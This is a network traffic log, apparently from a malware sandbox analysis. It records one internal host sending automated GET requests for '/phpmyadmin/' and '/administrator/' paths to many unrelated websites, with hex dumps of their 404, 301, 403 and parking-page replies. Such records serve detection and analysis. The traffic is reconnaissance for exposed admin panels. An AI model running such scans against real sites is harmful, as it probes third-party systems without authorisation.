2024-02-20 23:26:10 UTC	16384	IN	Data Raw: 75 67 69 6e 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 61 73 73 65 74 73 2f 6c 69 62 2f 65 69 63 6f 6e 73 2f 63 73 73 2f 65 6c 65 0d 0a 32 30 30 30 0d 0a 6d 65 6e 74 6f 72 2d 69 63 6f 6e 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 35 2e 32 37 2e 30 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 65 6c 65 6d 65 6e 74 6f 72 2d 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 66 63 61 2e 65 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 72 6f 6e 74 65 6e 64 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 31 39 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c Data Ascii: ugins/elementor/assets/lib/eicons/css/ele2000mentor-icons.min.css?ver=5.27.0' media='all' /><link rel='stylesheet' id='elementor-frontend-css' href='https://cfca.eu/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.19.2' media='all' /><
2024-02-20 23:26:11 UTC	16384	IN	Data Raw: 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 61 6c 65 77 61 79 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 0a 20 20 66 6f 0d 0a 31 30 30 30 0d 0a 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 61 6c 65 77 61 79 2f 76 32 39 2f 31 50 74 73 67 38 7a 59 53 5f 53 4b 67 67 50 4e 79 43 67 34 51 49 46 71 50 66 45 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 38 2c 20 55 2b 32 30 42 34 Data Ascii: ce { font-family: 'Raleway'; font-style: italic; fo1000nt-weight: 600; font-display: swap; src: url(https://fonts.gstatic.com/s/raleway/v29/1Ptsg8zYS_SKggPNyCg4QIFqPfE.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C88, U+20B4
2024-02-20 23:26:11 UTC	14797	IN	Data Raw: 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 61 6c 65 77 61 79 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 61 6c 65 77 61 79 2f 76 32 39 2f 31 50 74 75 67 38 7a 59 53 5f 53 4b 67 67 50 4e 79 43 6b 49 54 35 6c 75 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 33 30 31 2c 20 55 2b 30 34 30 30 2d 30 34 Data Ascii: }/* cyrillic */@font-face { font-family: 'Raleway'; font-style: normal; font-weight: 600; font-display: swap; src: url(https://fonts.gstatic.com/s/raleway/v29/1Ptug8zYS_SKggPNyCkIT5lu.woff2) format('woff2'); unicode-range: U+0301, U+0400-04

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.6	57199	208.109.43.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	179	OUT	GET /phpmyadmin/ HTTP/1.1 Host: waukesha-water.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:10 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.6	57200	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_DiIAByhVYT9YwDGGxAO9Z2kMLCT7XEcJQc6ZMB32cte91h5fNthBiapYIfVXG7fE0lbMQi9WMbmvxTfl13WQlA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:10 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.6	57073	15.161.71.77	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	183	OUT	GET /phpmyadmin/ HTTP/1.1 Host: iisalessandrini.edu.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	443	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: same-origin Location: https://iisalessandrini.edu.it/phpmyadmin Content-Length: 249 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:10 UTC	249	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 69 73 61 6c 65 73 73 61 6e 64 72 69 6e 69 2e 65 64 75 2e 69 74 2f 70 68 70 6d 79 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://iisalessandrini.edu.it/phpmyadmin">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.6	57332	62.210.211.126	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	185	OUT	GET /phpmyadmin/ HTTP/1.1 Host: voltage-distribution.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	180	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 287 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:10 UTC	287	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6f 6c 74 61 67 65 2d 64 69 73 74 72 69 62 75 74 69 6f 6e 2e 63 6f 6d 20 50 6f Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at voltage-distribution.com Po

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.6	57383	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	390	OUT	GET /administrator/index.php HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; lander_type=parking; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://att.com.au/administrator/
2024-02-20 23:26:10 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_lEkjxxe6Eh2AFYlgNQi+56hlX5GeGaOUt/5yMLPOdBuhMO+R+Y5TyP8yQpJknKMCn5JMteYmw/2NpWAs6KHdAA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:10 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.6	57207	13.232.255.130	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	180	OUT	GET /phpmyadmin/ HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	163	IN	HTTP/1.1 403 Forbidden Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache Content-Length: 94 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:10 UTC	94	IN	Data Raw: 46 6f 72 20 73 65 63 75 72 69 74 79 20 72 65 61 73 6f 6e 73 2c 20 74 68 69 73 20 55 52 4c 20 69 73 20 6f 6e 6c 79 20 61 63 63 65 73 73 69 62 6c 65 20 75 73 69 6e 67 20 6c 6f 63 61 6c 68 6f 73 74 20 28 31 32 37 2e 30 2e 30 2e 31 29 20 61 73 20 74 68 65 20 68 6f 73 74 6e 61 6d 65 2e Data Ascii: For security reasons, this URL is only accessible using localhost (127.0.0.1) as the hostname.

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.6	57440	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	400	OUT	GET /administrator/index.php HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; lander_type=forwarder; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://acidvision.com/administrator/
2024-02-20 23:26:10 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Content-Length: 315 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-13b" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_FwhEBYWF8IauY0wvH21FhXPCqnj2dXkH8Ta6NbD1hCpVdM/kzd0U/GvjL6lJ84wpKybeoJ23SyoNfwPygAqzxg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:10 UTC	315	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.j

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.6	57706	75.2.70.75	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	174	OUT	GET /administrator HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	185	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.eyegage.com/administrator
2024-02-20 23:26:10 UTC	166	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.6	57673	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	175	OUT	GET /phpmyadmin/ HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Content-Length: 315 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-13b" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_BDUQHvR3aSk/dKhqoigTWwdJB04vMILF53k8X8LOISPmcQ+M9TXCShVuhDX0F6dSwIYaLnTzM9TKVlGh0O2AoA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:10 UTC	315	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.j

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.6	57741	162.0.235.125	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	185	OUT	GET /administrator/ HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	409	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://norwegischlernen.info/index.php/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked date: Tue, 20 Feb 2024 23:26:10 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:10 UTC	15975	IN	Data Raw: 37 38 46 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f Data Ascii: 78F0<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found – norwegischlernen.info
2024-02-20 23:26:11 UTC	16384	IN	Data Raw: 74 69 63 61 6c 2d 73 65 63 6f 6e 64 61 72 79 2d 74 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 73 65 63 6f 6e 64 61 72 79 29 20 30 25 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 74 69 63 61 6c 2d 74 65 72 74 69 61 72 79 2d 74 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 76 61 72 28 2d 2d 